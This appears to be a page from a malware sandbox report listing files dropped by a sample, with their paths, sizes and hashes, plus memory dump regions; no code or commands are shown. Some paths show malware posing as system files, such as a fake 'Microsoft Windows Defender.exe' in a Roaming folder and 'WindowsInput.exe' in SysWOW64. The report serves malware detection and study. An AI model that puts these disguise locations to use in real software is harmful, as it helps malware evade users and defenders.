913bd976ce3a054af033a181f653a1dc054e0ecbcb12503064278133425e9920

SHA512
fb6ee1cb77911803e8f574afa60ead153ab668dacea1f5b73a346a0e52ea7dff76ee8847e3a8d5189209796e9fead8ca3c76bc159288f972ed7a919c3e9f695c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe

Filesize
45KB

MD5
f8a058339574d644e6dabe6fb91c0962

SHA1
c275fbe618e42da33141b90734ec40f0f30f8de3

SHA256
4458c76eeb0fe2a5c143560f8e6205a80c437b5d328e4873839c8a2023c54b19

SHA512
f43bcd3655771465cc54c8a1fbae4bf1752e718e4d456a025e386f56fdb2621462f243d37ecfe7187f97f44d984a418902b0131bafd3e6a7e6391cd17ee6a47e

Download Submit
C:\Users\SubZ\PERMENANTSPOOFER.exe

Filesize
92KB

MD5
b8cb6fdf807b097ae3c0ef1de8d38a95

SHA1
3963182e296c290ad64343ac303da7e5c88a967b

SHA256
6605281bddf366bc79135f3ca70ee1c0ff0463bf4220ca1e384e26f218360ddf

SHA512
5b05f009871d588147d95c72579b866f44ec4b536e5b7f7fcec101a7c61ced7076dbd65095ba7c017624bdc62bfe54edd0d428213073bb8f5d6a6b0d8bd8498e

Download Submit
C:\Windows\SysWOW64\WindowsInput.InstallLog

Filesize
224B

MD5
e469dda91ae810a1f94c96060f3f8a65

SHA1
0b4b3b0f6f937016b1e045ce5313ee2a65a38630

SHA256
d42fee8db8eb0e047ca53ad59b1c9bc69fe04993be36fec502e3532371908842

SHA512
2eb4037361c03e195c642a53f55a3182a6df19903db503060e366f2394750e64ae04fdaace61ef5a6dba649defc88322d78edd2928bc53ebd1ce11d68cc88dac

Download Submit
C:\Windows\SysWOW64\WindowsInput.InstallLog

Filesize
597B

MD5
c2291863df7c2d3038ce3c22fa276506

SHA1
7b7d2bc07a6c35523807342c747c9b6a19f3184e

SHA256
14504199bede3f46129969dbd2b7680f2e5b7fcd73a3e427ce1bb6217a6d13da

SHA512
00bf40174a67e3e663d18a887c5b461a1e5ead0b27f0a139d87969158c58f4ca72cfa5a731dda239356192ca4cb5ac6ae2b0e37401d534e686cabacd3cbee8fa

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe

Filesize
21KB

MD5
e854a4636afc652b320e12e50ba4080e

SHA1
8a4ac6ecc22ee5f3a8ec846d38b41ff18c641fdc

SHA256
94b9c78c6fa2bf61fba20a08ad4563f7dd2f5668c28eff227965ce0a2032d5d5

SHA512
30aabd5079b6ed0948eb70fd18e9166096e4ba5d1d47fc35b7270f931d19bbe6cd929b6010f70297bf5272dc5a79e2523721354d211c4080d68ad8d17e316118

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe

Filesize
17KB

MD5
1d6541ba51aaa70ee1d26a2c64f22b69

SHA1
12a67df9c8561cb00f6f811498148b3dc63de8a9

SHA256
fc5bc33e6ac5e962a403d72354b3dc089ad2db15c1c67c87bb3fcca96fe41874

SHA512
ca7dca0e7b5b4ce2070a2124b5b887770e7b11a74bf65c5ead9c3a28d064cbb443d5b797ea078f5cd8fc1ba64feb1429082afa4345567d776494578af3b27ef2

Download Submit
\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
83KB

MD5
a2200770fad0ba05949a9081bb12129e

SHA1
57c30eb019701cc941c0e2f738137535181124e3

SHA256
c2f039be05e87f9c71f6fa957f787c1bf9c1cc11f22de6c27979855cd79a59be

SHA512
905bcbdf8ac22eb24d6742ee6b18798f2e538656c11ea752c7a0c4f2bdd79b7687966eacccb59738c7e0ed0da0edc3ff5bfea0452a758179cd3aa84d64b44504

Download Submit
\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
150KB

MD5
986d497d5a2781ee5fa3adc1f6f89797

SHA1
94f7c174b36efe44aa01e3b2c8b7e0d2059f392a

SHA256
f962bdd4fbf44cc7a877dfa6028af6f6a9f75693d69d3a5fc3a59a122b966188

SHA512
be3ddad9f737b40ac63ef47ca1310d7873fccf810bfdd8c2e48ad1e97065ea6c6f7853f77297f410cade88907a8dbd4bf46c12ccd1dc349c212d2d49b82ca101

Download Submit
\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
531KB

MD5
2949c534583bcad1d090b20907720746

SHA1
015eb6a37c7a5dc26b7e02eac945f2bca4b810f1

SHA256
57e8e0ba12feaf2171e76703229d43785b5eae89afeeac6946b77081765573d8

SHA512
4074397b36071437f407363245a54c395b12de60915b0913eacd4b7867a39180df591e4808772f8aa617269a9220984f11502e685bbcbe24ca9142d722aa3196

Download Submit
\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
32KB

MD5
60dac2faa615c08734d618f24628859b

SHA1
84584e4313ce9b173aed38e887c9631d705ec660

SHA256
fc3a0440e7f4713636902f35148dddeae1aef0f1af15963957bc0a393ac8f969

SHA512
17fb2b0bd7df503dc33f09153bb79f3bfbfc71c6cf8da66b87af59e418c7878b62bf187385d3dc1ea05cd1b88abd688a44afa5fb15b796cc2847cdd0a37c3b9c

Download Submit
\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

Filesize
192KB

MD5
a06f9eecbf02f703441ac37509621bd1

SHA1
7451ce85fc9397bfad1aa8ac7250cd296fd7bd8e

SHA256
8cfa2bb32ddd613834a6ab4725ee2b7779a62493b39223213ac119aa9ae0b1d3

SHA512
7b92b2d4f9e4d7dfa5d4ecaa41296c5c6c7a1aa3db31ff9a7a33669bf76a9d9a38a1c1059159762830d2fb82c785a6e689e415038cebbe2d9cd7dfb9b792bff8

Download Submit
\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

Filesize
269KB

MD5
8551d6cff4e6241c4155fef8e245ad98

SHA1
17d27d5db0c9d68ac8be817ce3809f66c570fa36

SHA256
1618df757ebd14f0b73cdeef6be48d86c7868306073d65c855d4cc16e9237f48

SHA512
ced460e8b65f82caa28a9fbe595d5e142ea2dd587cf42b77d1a6a0e7e90693c6b5c4a6cec5a62a5800a1296d637a64359959d073d935b69ec4c7147c3b211cfb

Download Submit
\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE

Filesize
252KB

MD5
675ab338a7d52d672e93114930ab6bd9

SHA1
a009d63b197b8738bf59caca807e0cd61b55e68c

SHA256
cdb498b36e4df2c1dda1513d4e3173bdc8d54f893987e793e1a4941dd2883586

SHA512
dd303c48d7f2c4bf46a39fb8039f2214fbb3718742e4d02d819a7bd18385809a5642efddac68c67e8a4405535bf705328db1996eaee82a410b0aecdd6621f9d4

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI21082\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
bcb8b9f6606d4094270b6d9b2ed92139

SHA1
bd55e985db649eadcb444857beed397362a2ba7b

SHA256
fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118

SHA512
869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI21082\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI21082\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
20ddf543a1abe7aee845de1ec1d3aa8e

SHA1
0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf

SHA256
d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8

SHA512
96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI21082\python312.dll

Filesize
309KB

MD5
33fb4c14d725122600bc1c2014bcf4fe

SHA1
cc506eb743d3bf79a130d44603c8f47bbe6ff354

SHA256
ce888ed3888443b144384fa3d4bad7f9d5093f55672aa1b7f71df02c1036b287

SHA512
8a1deec838b26197840cb913244f2acfbc383ddfd2fed924f74c530d74775e307c0e947462afe9d00809fbc7a0ccd3be2cfd0c06c71626762c0480ba9f7c6862

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI21082\ucrtbase.dll

Filesize
491KB

MD5
09efc3d8cec908d4ccea093a4a9931f5

SHA1
9cc19b2992729c5aeddd07104abf1bfb56b0db7f

SHA256
153532b9d9d3530f61234f8813825f17870daf17caf6b032769aa0e5ee2be973

SHA512
f402e4b90a2884c3ebf3cd2416aff59479a5918b27fcd28dba212214e5e8f3247f183978b656a0f13c61a67d774baab95f3eb522318ad4b9eec823a8858d4c04

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe

Filesize
140KB

MD5
0f34a071354f1dcdc8a667313244fe5f

SHA1
83bffeca270d092f645bbde14e047cee14993e17

SHA256
9de0ec9b0c80df493014a475eea22a626f1ac315cc23f6c5ffc1d05e09ec788c

SHA512
a96501280b211604bf660cb7f06104574ecdac8fbf376af8df37cf9ee2e033e2edd9349d3f3fee9268e90af00f78a3ba2b3d65b1d13584d4dd83161616a692a1

Download Submit
\Windows\SysWOW64\WindowsInput.exe

Filesize
7KB

MD5
3a1bd50212f43f44c880f41410322e0b

SHA1
10dcbd92ba2a7d187d473dc884ecdc5735a38d1e

SHA256
b4560b55b106e8e3995be55a0846780f284b94e0e68a2c79e1baeef2d3d5bddd

SHA512
3fc301f8d747d0d527ea15f9b0cf18ad3d156f8160a2781232b2da5e8d3e1a85d340273c9525c7c353a4f39841d4457f23729894562e7cd5a661532c8a9016ef

Download Submit
memory/1080-208-0x00000000042E0000-0x0000000004320000-memory.dmp

Filesize
256KB

Download
memory/1080-209-0x00000000008B0000-0x00000000008C0000-memory.dmp

Filesize
64KB

Download
memory/1080-207-0x0000000074410000-0x0000000074AFE000-memory.dmp

Filesize
6.9MB

Download
memory/1080-205-0x0000000000300000-0x00000000003DA000-memory.dmp

Filesize
872KB

Download
memory/1080-267-0x0000000074410000-0x0000000074AFE000-memory.dmp

Filesize
6.9MB

Download
memory/1080-268-0x00000000042E0000-0x0000000004320000-memory.dmp

Filesize
256KB

Download
memory/1944-193-0x000007FEECD90000-0x000007FEED72D000-memory.dmp

Filesize
9.6MB

Download
memory/1944-175-0x000007FEECD90000-0x000007FEED72D000-memory.dmp

Filesize
9.6MB

Download
memory/1944-178-0x000007FEECD90000-0x000007FEED72D000-memory.dmp

Filesize
9.6MB

Download
memory/1944-176-0x0000000002050000-0x00000000020D0000-memory.dmp

Filesize
512KB

Download
memory/2256-144-0x000007FEF5050000-0x000007FEF5728000-memory.dmp

Filesize
6.8MB

Download
memory/2344-3-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2344-8-0x0000000000400000-0x000000000129A000-memory.dmp

Filesize
14.6MB

Download
memory/2344-47-0x0000000000400000-0x000000000129A000-memory.dmp

Filesize
14.6MB

Download
memory/2344-10-0x0000000000400000-0x000000000129A000-memory.dmp

Filesize
14.6MB

Download
memory/2344-1-0x0000000000400000-0x000000000129A000-memory.dmp

Filesize
14.6MB

Download
memory/2344-5-0x0000000000400000-0x000000000129A000-memory.dmp

Filesize
14.6MB

Download
memory/2392-263-0x000007FEF3C20000-0x000007FEF460C000-memory.dmp

Filesize
9.9MB

Download
memory/2580-143-0x0000000077590000-0x0000000077739000-memory.dmp

Filesize
1.7MB

Download
memory/2580-113-0x000000013F0B0000-0x000000013FA0C000-memory.dmp

Filesize
9.4MB

Download
memory/2580-154-0x0000000077590000-0x0000000077739000-memory.dmp

Filesize
1.7MB

Download
memory/2664-7-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2664-0-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2704-196-0x0000000004E50000-0x0000000004E9E000-memory.dmp

Filesize
312KB

Download
memory/2704-206-0x0000000074410000-0x0000000074AFE000-memory.dmp

Filesize
6.9MB

Download
memory/2704-142-0x0000000074410000-0x0000000074AFE000-memory.dmp

Filesize
6.9MB

Download
memory/2704-149-0x0000000002170000-0x00000000021BC000-memory.dmp

Filesize
304KB

Download
memory/2704-148-0x00000000002F0000-0x00000000002FA000-memory.dmp

Filesize
40KB

Download
memory/2704-153-0x0000000000620000-0x0000000000628000-memory.dmp

Filesize
32KB

Download
memory/2704-146-0x0000000000540000-0x0000000000580000-memory.dmp

Filesize
256KB

Download
memory/2704-156-0x0000000000690000-0x000000000069C000-memory.dmp

Filesize
48KB

Download
memory/2704-155-0x0000000000680000-0x0000000000688000-memory.dmp

Filesize
32KB

Download
memory/2704-145-0x0000000000020000-0x00000000000FA000-memory.dmp

Filesize
872KB

Download
memory/2708-164-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Filesize
9.9MB

Download
memory/2708-141-0x0000000001190000-0x00000000011B2000-memory.dmp

Filesize
136KB

Download
memory/2708-147-0x000000001AE10000-0x000000001AE90000-memory.dmp

Filesize
512KB

Download
memory/2708-140-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Filesize
9.9MB

Download